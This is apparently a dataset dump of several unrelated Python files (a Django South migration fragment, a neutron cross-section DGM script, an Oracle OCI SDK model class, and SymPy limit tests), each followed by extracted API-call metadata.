'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'subcategories'", 'null': 'True', 'to': "orm['market.MarketCategory']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '60', 'db_index': 'True'})
},
'shops.shop': {
'Meta': {'object_name': 'Shop'},
'admin': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'bids': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'default': "'39.29038,-76.61219'", 'max_length': '255'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'views': ('django.db.models.fields.IntegerField', [], {'default': '0'})
}
}
complete_apps = ['inventory']
| [
"south.db.db.send_create_signal",
"south.db.db.delete_table"
]
| [((389, 440), 'south.db.db.send_create_signal', 'db.send_create_signal', (['"""inventory"""', "['ProductType']"], {}), "('inventory', ['ProductType'])\n", (410, 440), False, 'from south.db import db\n'), ((1480, 1527), 'south.db.db.send_create_signal', 'db.send_create_signal', (['"""inventory"""', "['Product']"], {}), "('inventory', ['Product'])\n", (1501, 1527), False, 'from south.db import db\n'), ((3794, 3838), 'south.db.db.send_create_signal', 'db.send_create_signal', (['"""inventory"""', "['Coin']"], {}), "('inventory', ['Coin'])\n", (3815, 3838), False, 'from south.db import db\n'), ((3927, 3967), 'south.db.db.delete_table', 'db.delete_table', (['"""inventory_producttype"""'], {}), "('inventory_producttype')\n", (3942, 3967), False, 'from south.db import db\n'), ((4012, 4048), 'south.db.db.delete_table', 'db.delete_table', (['"""inventory_product"""'], {}), "('inventory_product')\n", (4027, 4048), False, 'from south.db import db\n'), ((4090, 4123), 'south.db.db.delete_table', 'db.delete_table', (['"""inventory_coin"""'], {}), "('inventory_coin')\n", (4105, 4123), False, 'from south.db import db\n')] |
import numpy as np
import sys
sys.path.append('/homes/rlreed/workspace/unotran/src')
from coarseBounds import computeBounds, Grouping
import pickle
from makeDLPbasis import makeBasis as makeDLP
from makeKLTbasis import makeBasis as makeKLT
import sph
import sph_dgm
import pydgm
def buildGEO(ass_map):
fine_map = [1]
coarse_map = [1.26]
material_map = [[1], [2], [3], [4], [5], [6], [7], [8], [9], [10]]
npins = len(ass_map)
cm = [0.0]
fm = []
mm = []
for i, ass in enumerate(ass_map):
mm += material_map[ass]
cm += coarse_map
fm += fine_map
cm = np.cumsum(cm)
return npins, fm, cm, mm
def makeDGMXS(G, refXS, dgmstructure, basisType):
if 'klt' in basisType:
makeKLT(basisType, dgmstructure)
else:
makeDLP(dgmstructure)
dgmstructure.fname = '{}_{}'.format(basisType, dgmstructure.fname)
fname = '_homo.'.join(xs_name.split('.'))
refXS.write_homogenized_XS(fname)
nPin, fm, cm, mm = buildGEO(pin_map)
dgm = sph_dgm.DGMSOLVER(G, fname, fm, cm, mm, nPin, dgmstructure, solveFlag=False)
pydgm.dgmsolver.initialize_dgmsolver()
dgm.extractInfo()
pydgm.dgmsolver.finalize_dgmsolver()
pydgm.control.finalize_control()
nCellPerPin = dgm.phi.shape[2] // dgm.npin
return sph_dgm.XS(G, nCellPerPin, dgm.sig_t, dgm.vsig_f, dgm.chi, dgm.sig_s)
if __name__ == '__main__':
np.set_printoptions(precision=6)
G = 44
dgmstructure = computeBounds(G, 'full', 1, 0.0, 1.3, 60)
fname = dgmstructure.fname
xs_name = 'XS/{}gXS.anlxs'.format(G)
pin_map = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
data_path = 'data2'
# Get the homogenized cross sections
refXS = pickle.load(open('{}/refXS_sph_space_{}.p'.format(data_path, G), 'rb'))
for basis in ['dlp', 'klt_full', 'klt_combine', 'klt_pins_full']:
dgmstructure.fname = fname
XS = makeDGMXS(G, refXS, dgmstructure, basis)
pickle.dump(XS, open('{}/refXS_dgm_{}_{}_h{}.p'.format(data_path, dgmstructure.fname, 'fine_mu', 0), 'wb'))
| [
"sph_dgm.DGMSOLVER",
"coarseBounds.computeBounds",
"makeDLPbasis.makeBasis",
"pydgm.dgmsolver.initialize_dgmsolver",
"pydgm.control.finalize_control",
"numpy.cumsum",
"sph_dgm.XS",
"sys.path.append",
"makeKLTbasis.makeBasis",
"pydgm.dgmsolver.finalize_dgmsolver",
"numpy.set_printoptions"
]
| [((30, 84), 'sys.path.append', 'sys.path.append', (['"""/homes/rlreed/workspace/unotran/src"""'], {}), "('/homes/rlreed/workspace/unotran/src')\n", (45, 84), False, 'import sys\n'), ((612, 625), 'numpy.cumsum', 'np.cumsum', (['cm'], {}), '(cm)\n', (621, 625), True, 'import numpy as np\n'), ((1025, 1101), 'sph_dgm.DGMSOLVER', 'sph_dgm.DGMSOLVER', (['G', 'fname', 'fm', 'cm', 'mm', 'nPin', 'dgmstructure'], {'solveFlag': '(False)'}), '(G, fname, fm, cm, mm, nPin, dgmstructure, solveFlag=False)\n', (1042, 1101), False, 'import sph_dgm\n'), ((1106, 1144), 'pydgm.dgmsolver.initialize_dgmsolver', 'pydgm.dgmsolver.initialize_dgmsolver', ([], {}), '()\n', (1142, 1144), False, 'import pydgm\n'), ((1172, 1208), 'pydgm.dgmsolver.finalize_dgmsolver', 'pydgm.dgmsolver.finalize_dgmsolver', ([], {}), '()\n', (1206, 1208), False, 'import pydgm\n'), ((1213, 1245), 'pydgm.control.finalize_control', 'pydgm.control.finalize_control', ([], {}), '()\n', (1243, 1245), False, 'import pydgm\n'), ((1306, 1375), 'sph_dgm.XS', 'sph_dgm.XS', (['G', 'nCellPerPin', 'dgm.sig_t', 'dgm.vsig_f', 'dgm.chi', 'dgm.sig_s'], {}), '(G, nCellPerPin, dgm.sig_t, dgm.vsig_f, dgm.chi, dgm.sig_s)\n', (1316, 1375), False, 'import sph_dgm\n'), ((1408, 1440), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'precision': '(6)'}), '(precision=6)\n', (1427, 1440), True, 'import numpy as np\n'), ((1473, 1514), 'coarseBounds.computeBounds', 'computeBounds', (['G', '"""full"""', '(1)', '(0.0)', '(1.3)', '(60)'], {}), "(G, 'full', 1, 0.0, 1.3, 60)\n", (1486, 1514), False, 'from coarseBounds import computeBounds, Grouping\n'), ((742, 774), 'makeKLTbasis.makeBasis', 'makeKLT', (['basisType', 'dgmstructure'], {}), '(basisType, dgmstructure)\n', (749, 774), True, 'from makeKLTbasis import makeBasis as makeKLT\n'), ((793, 814), 'makeDLPbasis.makeBasis', 'makeDLP', (['dgmstructure'], {}), '(dgmstructure)\n', (800, 814), True, 'from makeDLPbasis import makeBasis as makeDLP\n')] |
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class ManagementAgentAggregationDimensions(object):
"""
The Aggregation of Management Agent Dimensions
"""
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "ACTIVE"
AVAILABILITY_STATUS_ACTIVE = "ACTIVE"
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "SILENT"
AVAILABILITY_STATUS_SILENT = "SILENT"
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "NOT_AVAILABLE"
AVAILABILITY_STATUS_NOT_AVAILABLE = "NOT_AVAILABLE"
#: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "LINUX"
PLATFORM_TYPE_LINUX = "LINUX"
#: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "WINDOWS"
PLATFORM_TYPE_WINDOWS = "WINDOWS"
#: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "AGENT"
INSTALL_TYPE_AGENT = "AGENT"
#: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "GATEWAY"
INSTALL_TYPE_GATEWAY = "GATEWAY"
def __init__(self, **kwargs):
"""
Initializes a new ManagementAgentAggregationDimensions object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param availability_status:
The value to assign to the availability_status property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type availability_status: str
:param platform_type:
The value to assign to the platform_type property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type platform_type: str
:param version:
The value to assign to the version property of this ManagementAgentAggregationDimensions.
:type version: str
:param has_plugins:
The value to assign to the has_plugins property of this ManagementAgentAggregationDimensions.
:type has_plugins: bool
:param install_type:
The value to assign to the install_type property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type install_type: str
"""
self.swagger_types = {
'availability_status': 'str',
'platform_type': 'str',
'version': 'str',
'has_plugins': 'bool',
'install_type': 'str'
}
self.attribute_map = {
'availability_status': 'availabilityStatus',
'platform_type': 'platformType',
'version': 'version',
'has_plugins': 'hasPlugins',
'install_type': 'installType'
}
self._availability_status = None
self._platform_type = None
self._version = None
self._has_plugins = None
self._install_type = None
@property
def availability_status(self):
"""
Gets the availability_status of this ManagementAgentAggregationDimensions.
The availability status of managementAgent
Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The availability_status of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._availability_status
@availability_status.setter
def availability_status(self, availability_status):
"""
Sets the availability_status of this ManagementAgentAggregationDimensions.
The availability status of managementAgent
:param availability_status: The availability_status of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["ACTIVE", "SILENT", "NOT_AVAILABLE"]
if not value_allowed_none_or_none_sentinel(availability_status, allowed_values):
availability_status = 'UNKNOWN_ENUM_VALUE'
self._availability_status = availability_status
@property
def platform_type(self):
"""
Gets the platform_type of this ManagementAgentAggregationDimensions.
Platform Type
Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The platform_type of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._platform_type
@platform_type.setter
def platform_type(self, platform_type):
"""
Sets the platform_type of this ManagementAgentAggregationDimensions.
Platform Type
:param platform_type: The platform_type of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["LINUX", "WINDOWS"]
if not value_allowed_none_or_none_sentinel(platform_type, allowed_values):
platform_type = 'UNKNOWN_ENUM_VALUE'
self._platform_type = platform_type
@property
def version(self):
"""
Gets the version of this ManagementAgentAggregationDimensions.
Agent image version
:return: The version of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._version
@version.setter
def version(self, version):
"""
Sets the version of this ManagementAgentAggregationDimensions.
Agent image version
:param version: The version of this ManagementAgentAggregationDimensions.
:type: str
"""
self._version = version
@property
def has_plugins(self):
"""
Gets the has_plugins of this ManagementAgentAggregationDimensions.
Whether or not a managementAgent has at least one plugin
:return: The has_plugins of this ManagementAgentAggregationDimensions.
:rtype: bool
"""
return self._has_plugins
@has_plugins.setter
def has_plugins(self, has_plugins):
"""
Sets the has_plugins of this ManagementAgentAggregationDimensions.
Whether or not a managementAgent has at least one plugin
:param has_plugins: The has_plugins of this ManagementAgentAggregationDimensions.
:type: bool
"""
self._has_plugins = has_plugins
@property
def install_type(self):
"""
Gets the install_type of this ManagementAgentAggregationDimensions.
The install type, either AGENT or GATEWAY
Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The install_type of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._install_type
@install_type.setter
def install_type(self, install_type):
"""
Sets the install_type of this ManagementAgentAggregationDimensions.
The install type, either AGENT or GATEWAY
:param install_type: The install_type of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["AGENT", "GATEWAY"]
if not value_allowed_none_or_none_sentinel(install_type, allowed_values):
install_type = 'UNKNOWN_ENUM_VALUE'
self._install_type = install_type
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| [
"oci.util.formatted_flat_dict",
"oci.util.value_allowed_none_or_none_sentinel"
]
| [((9062, 9087), 'oci.util.formatted_flat_dict', 'formatted_flat_dict', (['self'], {}), '(self)\n', (9081, 9087), False, 'from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel\n'), ((5437, 5509), 'oci.util.value_allowed_none_or_none_sentinel', 'value_allowed_none_or_none_sentinel', (['availability_status', 'allowed_values'], {}), '(availability_status, allowed_values)\n', (5472, 5509), False, 'from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel\n'), ((6480, 6546), 'oci.util.value_allowed_none_or_none_sentinel', 'value_allowed_none_or_none_sentinel', (['platform_type', 'allowed_values'], {}), '(platform_type, allowed_values)\n', (6515, 6546), False, 'from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel\n'), ((8865, 8930), 'oci.util.value_allowed_none_or_none_sentinel', 'value_allowed_none_or_none_sentinel', (['install_type', 'allowed_values'], {}), '(install_type, allowed_values)\n', (8900, 8930), False, 'from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel\n')] |
from sympy import (
limit,
Symbol,
oo,
sqrt,
Rational,
log,
exp,
cos,
sin,
tan,
pi,
asin,
together,
root,
S,
)
# Numbers listed with the tests refer to problem numbers in the book
# "Anti-demidovich, problemas resueltos, Ed. URSS"
x = Symbol("x")
def test_leadterm():
assert (3 + 2 * x ** (log(3) / log(2) - 1)).leadterm(x) == (3, 0)
def root3(x):
return root(x, 3)
def root4(x):
return root(x, 4)
def test_Limits_simple_0():
assert limit((2 ** (x + 1) + 3 ** (x + 1)) / (2 ** x + 3 ** x), x, oo) == 3 # 175
def test_Limits_simple_1():
assert limit((x + 1) * (x + 2) * (x + 3) / x ** 3, x, oo) == 1 # 172
assert limit(sqrt(x + 1) - sqrt(x), x, oo) == 0 # 179
assert (
limit((2 * x - 3) * (3 * x + 5) * (4 * x - 6) / (3 * x ** 3 + x - 1), x, oo)
== 8
) # Primjer 1
assert limit(x / root3(x ** 3 + 10), x, oo) == 1 # Primjer 2
assert limit((x + 1) ** 2 / (x ** 2 + 1), x, oo) == 1 # 181
def test_Limits_simple_2():
assert limit(1000 * x / (x ** 2 - 1), x, oo) == 0 # 182
assert limit((x ** 2 - 5 * x + 1) / (3 * x + 7), x, oo) is oo # 183
assert limit((2 * x ** 2 - x + 3) / (x ** 3 - 8 * x + 5), x, oo) == 0 # 184
assert limit((2 * x ** 2 - 3 * x - 4) / sqrt(x ** 4 + 1), x, oo) == 2 # 186
assert limit((2 * x + 3) / (x + root3(x)), x, oo) == 2 # 187
assert limit(x ** 2 / (10 + x * sqrt(x)), x, oo) is oo # 188
assert limit(root3(x ** 2 + 1) / (x + 1), x, oo) == 0 # 189
assert limit(sqrt(x) / sqrt(x + sqrt(x + sqrt(x))), x, oo) == 1 # 190
def test_Limits_simple_3a():
a = Symbol("a")
# issue 3513
assert together(limit((x ** 2 - (a + 1) * x + a) / (x ** 3 - a ** 3), x, a)) == (
a - 1
) / (
3 * a ** 2
) # 196
def test_Limits_simple_3b():
h = Symbol("h")
assert limit(((x + h) ** 3 - x ** 3) / h, h, 0) == 3 * x ** 2 # 197
assert limit((1 / (1 - x) - 3 / (1 - x ** 3)), x, 1) == -1 # 198
assert (
limit((sqrt(1 + x) - 1) / (root3(1 + x) - 1), x, 0) == Rational(3) / 2
) # Primer 4
assert limit((sqrt(x) - 1) / (x - 1), x, 1) == Rational(1) / 2 # 199
assert limit((sqrt(x) - 8) / (root3(x) - 4), x, 64) == 3 # 200
assert limit((root3(x) - 1) / (root4(x) - 1), x, 1) == Rational(4) / 3 # 201
assert (
limit((root3(x ** 2) - 2 * root3(x) + 1) / (x - 1) ** 2, x, 1)
== Rational(1) / 9
) # 202
def test_Limits_simple_4a():
a = Symbol("a")
assert limit((sqrt(x) - sqrt(a)) / (x - a), x, a) == 1 / (2 * sqrt(a)) # Primer 5
assert limit((sqrt(x) - 1) / (root3(x) - 1), x, 1) == Rational(3, 2) # 205
assert limit((sqrt(1 + x) - sqrt(1 - x)) / x, x, 0) == 1 # 207
assert limit(sqrt(x ** 2 - 5 * x + 6) - x, x, oo) == Rational(-5, 2) # 213
def test_limits_simple_4aa():
assert limit(x * (sqrt(x ** 2 + 1) - x), x, oo) == Rational(1) / 2 # 214
def test_Limits_simple_4b():
# issue 3511
assert limit(x - root3(x ** 3 - 1), x, oo) == 0 # 215
def test_Limits_simple_4c():
assert limit(log(1 + exp(x)) / x, x, -oo) == 0 # 267a
assert limit(log(1 + exp(x)) / x, x, oo) == 1 # 267b
def test_bounded():
assert limit(sin(x) / x, x, oo) == 0 # 216b
assert limit(x * sin(1 / x), x, 0) == 0 # 227a
def test_f1a():
# issue 3508:
assert limit((sin(2 * x) / x) ** (1 + x), x, 0) == 2 # Primer 7
def test_f1a2():
# issue 3509:
assert limit(((x - 1) / (x + 1)) ** x, x, oo) == exp(-2) # Primer 9
def test_f1b():
m = Symbol("m")
n = Symbol("n")
h = Symbol("h")
a = Symbol("a")
assert limit(sin(x) / x, x, 2) == sin(2) / 2 # 216a
assert limit(sin(3 * x) / x, x, 0) == 3 # 217
assert limit(sin(5 * x) / sin(2 * x), x, 0) == Rational(5, 2) # 218
assert limit(sin(pi * x) / sin(3 * pi * x), x, 0) == Rational(1, 3) # 219
assert limit(x * sin(pi / x), x, oo) == pi # 220
assert limit((1 - cos(x)) / x ** 2, x, 0) == S.Half # 221
assert limit(x * sin(1 / x), x, oo) == 1 # 227b
assert limit((cos(m * x) - cos(n * x)) / x ** 2, x, 0) == (
(n ** 2 - m ** 2) / 2
) # 232
assert limit((tan(x) - sin(x)) / x ** 3, x, 0) == S.Half # 233
assert limit((x - sin(2 * x)) / (x + sin(3 * x)), x, 0) == -Rational(1, 4) # 237
assert limit((1 - sqrt(cos(x))) / x ** 2, x, 0) == Rational(1, 4) # 239
assert limit((sqrt(1 + sin(x)) - sqrt(1 - sin(x))) / x, x, 0) == 1 # 240
assert limit((1 + h / x) ** x, x, oo) == exp(h) # Primer 9
assert limit((sin(x) - sin(a)) / (x - a), x, a) == cos(a) # 222, *176
assert limit((cos(x) - cos(a)) / (x - a), x, a) == -sin(a) # 223
assert limit((sin(x + h) - sin(x)) / h, h, 0) == cos(x) # 225
def test_f2a():
assert limit(((x + 1) / (2 * x + 1)) ** (x ** 2), x, oo) == 0 # Primer 8
def test_f2():
assert limit((sqrt(cos(x)) - root3(cos(x))) / (sin(x) ** 2), x, 0) == -Rational(
1, 12
) # *184
def test_f3():
a = Symbol("a")
# issue 3504
assert limit(asin(a * x) / x, x, 0) == a
| [
"sympy.sin",
"sympy.Symbol",
"sympy.cos",
"sympy.root",
"sympy.sqrt",
"sympy.limit",
"sympy.tan",
"sympy.log",
"sympy.exp",
"sympy.asin",
"sympy.Rational"
]
| [((297, 308), 'sympy.Symbol', 'Symbol', (['"""x"""'], {}), "('x')\n", (303, 308), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((429, 439), 'sympy.root', 'root', (['x', '(3)'], {}), '(x, 3)\n', (433, 439), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((467, 477), 'sympy.root', 'root', (['x', '(4)'], {}), '(x, 4)\n', (471, 477), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1656, 1667), 'sympy.Symbol', 'Symbol', (['"""a"""'], {}), "('a')\n", (1662, 1667), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1866, 1877), 'sympy.Symbol', 'Symbol', (['"""h"""'], {}), "('h')\n", (1872, 1877), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2518, 2529), 'sympy.Symbol', 'Symbol', (['"""a"""'], {}), "('a')\n", (2524, 2529), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3574, 3585), 'sympy.Symbol', 'Symbol', (['"""m"""'], {}), "('m')\n", (3580, 3585), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3594, 3605), 'sympy.Symbol', 'Symbol', (['"""n"""'], {}), "('n')\n", (3600, 3605), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3614, 3625), 'sympy.Symbol', 'Symbol', (['"""h"""'], {}), "('h')\n", (3620, 3625), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3634, 3645), 'sympy.Symbol', 'Symbol', (['"""a"""'], {}), "('a')\n", (3640, 3645), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((5020, 5031), 'sympy.Symbol', 'Symbol', (['"""a"""'], {}), "('a')\n", (5026, 5031), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((519, 582), 'sympy.limit', 'limit', (['((2 ** (x + 1) + 3 ** (x + 1)) / (2 ** x + 3 ** x))', 'x', 'oo'], {}), '((2 ** (x + 1) + 3 ** (x + 1)) / (2 ** x + 3 ** x), x, oo)\n', (524, 582), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((636, 686), 'sympy.limit', 'limit', (['((x + 1) * (x + 2) * (x + 3) / x ** 3)', 'x', 'oo'], {}), '((x + 1) * (x + 2) * (x + 3) / x ** 3, x, oo)\n', (641, 686), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((779, 855), 'sympy.limit', 'limit', (['((2 * x - 3) * (3 * x + 5) * (4 * x - 6) / (3 * x ** 3 + x - 1))', 'x', 'oo'], {}), '((2 * x - 3) * (3 * x + 5) * (4 * x - 6) / (3 * x ** 3 + x - 1), x, oo)\n', (784, 855), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((965, 1006), 'sympy.limit', 'limit', (['((x + 1) ** 2 / (x ** 2 + 1))', 'x', 'oo'], {}), '((x + 1) ** 2 / (x ** 2 + 1), x, oo)\n', (970, 1006), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1060, 1097), 'sympy.limit', 'limit', (['(1000 * x / (x ** 2 - 1))', 'x', 'oo'], {}), '(1000 * x / (x ** 2 - 1), x, oo)\n', (1065, 1097), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1121, 1169), 'sympy.limit', 'limit', (['((x ** 2 - 5 * x + 1) / (3 * x + 7))', 'x', 'oo'], {}), '((x ** 2 - 5 * x + 1) / (3 * x + 7), x, oo)\n', (1126, 1169), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1194, 1251), 'sympy.limit', 'limit', (['((2 * x ** 2 - x + 3) / (x ** 3 - 8 * x + 5))', 'x', 'oo'], {}), '((2 * x ** 2 - x + 3) / (x ** 3 - 8 * x + 5), x, oo)\n', (1199, 1251), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1889, 1929), 'sympy.limit', 'limit', (['(((x + h) ** 3 - x ** 3) / h)', 'h', '(0)'], {}), '(((x + h) ** 3 - x ** 3) / h, h, 0)\n', (1894, 1929), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1962, 2005), 'sympy.limit', 'limit', (['(1 / (1 - x) - 3 / (1 - x ** 3))', 'x', '(1)'], {}), '(1 / (1 - x) - 3 / (1 - x ** 3), x, 1)\n', (1967, 2005), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2675, 2689), 'sympy.Rational', 'Rational', (['(3)', '(2)'], {}), '(3, 2)\n', (2683, 2689), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2822, 2837), 'sympy.Rational', 'Rational', (['(-5)', '(2)'], {}), '(-5, 2)\n', (2830, 2837), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3486, 3524), 'sympy.limit', 'limit', (['(((x - 1) / (x + 1)) ** x)', 'x', 'oo'], {}), '(((x - 1) / (x + 1)) ** x, x, oo)\n', (3491, 3524), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3528, 3535), 'sympy.exp', 'exp', (['(-2)'], {}), '(-2)\n', (3531, 3535), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3805, 3819), 'sympy.Rational', 'Rational', (['(5)', '(2)'], {}), '(5, 2)\n', (3813, 3819), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((3884, 3898), 'sympy.Rational', 'Rational', (['(1)', '(3)'], {}), '(1, 3)\n', (3892, 3898), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4392, 4406), 'sympy.Rational', 'Rational', (['(1)', '(4)'], {}), '(1, 4)\n', (4400, 4406), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4504, 4534), 'sympy.limit', 'limit', (['((1 + h / x) ** x)', 'x', 'oo'], {}), '((1 + h / x) ** x, x, oo)\n', (4509, 4534), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4538, 4544), 'sympy.exp', 'exp', (['h'], {}), '(h)\n', (4541, 4544), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4612, 4618), 'sympy.cos', 'cos', (['a'], {}), '(a)\n', (4615, 4618), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4755, 4761), 'sympy.cos', 'cos', (['x'], {}), '(x)\n', (4758, 4761), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((4798, 4845), 'sympy.limit', 'limit', (['(((x + 1) / (2 * x + 1)) ** x ** 2)', 'x', 'oo'], {}), '(((x + 1) / (2 * x + 1)) ** x ** 2, x, oo)\n', (4803, 4845), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((1705, 1764), 'sympy.limit', 'limit', (['((x ** 2 - (a + 1) * x + a) / (x ** 3 - a ** 3))', 'x', 'a'], {}), '((x ** 2 - (a + 1) * x + a) / (x ** 3 - a ** 3), x, a)\n', (1710, 1764), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2097, 2108), 'sympy.Rational', 'Rational', (['(3)'], {}), '(3)\n', (2105, 2108), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2182, 2193), 'sympy.Rational', 'Rational', (['(1)'], {}), '(1)\n', (2190, 2193), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2332, 2343), 'sympy.Rational', 'Rational', (['(4)'], {}), '(4)\n', (2340, 2343), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, pi, asin, together, root, S\n'), ((2450, 2461), 'sympy.Rational', 'Rational', (['(1)'], {}), '(1)\n', (2458, 2461), False, 'from sympy import limit, Symbol, oo, sqrt, Rational, log, exp, cos, sin, tan, 